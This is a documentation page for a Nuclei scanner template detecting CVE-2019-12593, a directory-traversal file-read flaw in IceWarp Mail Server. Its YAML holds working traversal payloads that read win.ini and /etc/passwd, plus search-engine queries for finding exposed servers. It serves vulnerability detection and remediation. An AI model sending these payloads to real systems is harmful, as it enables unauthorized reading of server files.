Skip to content
Nuclei Templates

IceWarp Mail Server <=10.4.4 - Local File Inclusion

ID: CVE-2019-12593

Severity: high

Author: pikpikcu

Tags: cve,cve2019,packetstorm,lfi,icewarp

Description

Section titled “Description”

IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.

YAML Source

Section titled “YAML Source”
id: CVE-2019-12593


info:
  name: IceWarp Mail Server <=10.4.4 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: |
    IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
  impact: |
    An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
  remediation: |
    Upgrade IceWarp Mail Server to a version higher than 10.4.4 or apply the vendor-provided patch to fix the LFI vulnerability.
  reference:
    - https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt
    - http://www.icewarp.com
    - https://nvd.nist.gov/vuln/detail/CVE-2019-12593
    - http://packetstormsecurity.com/files/153161/IceWarp-10.4.4-Local-File-Inclusion.html
    - https://github.com/sobinge/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-12593
    cwe-id: CWE-22
    epss-score: 0.07016
    epss-percentile: 0.93948
    cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: icewarp
    product: mail_server
    shodan-query:
      - title:"icewarp"
      - http.title:"icewarp server administration"
      - http.title:"icewarp"
      - cpe:"cpe:2.3:a:icewarp:mail_server"
    fofa-query:
      - title="icewarp server administration"
      - title="icewarp"
    google-query:
      - Powered By IceWarp 10.4.4
      - intitle:"icewarp"
      - powered by icewarp 10.4.4
      - intitle:"icewarp server administration"
  tags: cve,cve2019,packetstorm,lfi,icewarp


http:
  - method: GET
    path:
      - '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini'
      - '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd'


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "[intl]"
          - "root:x:0"


      - type: status
        status:
          - 200
# digest: 4a0a004730450220243f9c8c88c410fecb70846cbd01d49e0c22a588c30f958e39f7f05461096a6f022100942c919b609904ca65870f2cd77777c530b641a572e6fed1377032d3af9346c5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-12593.yaml"

View on Github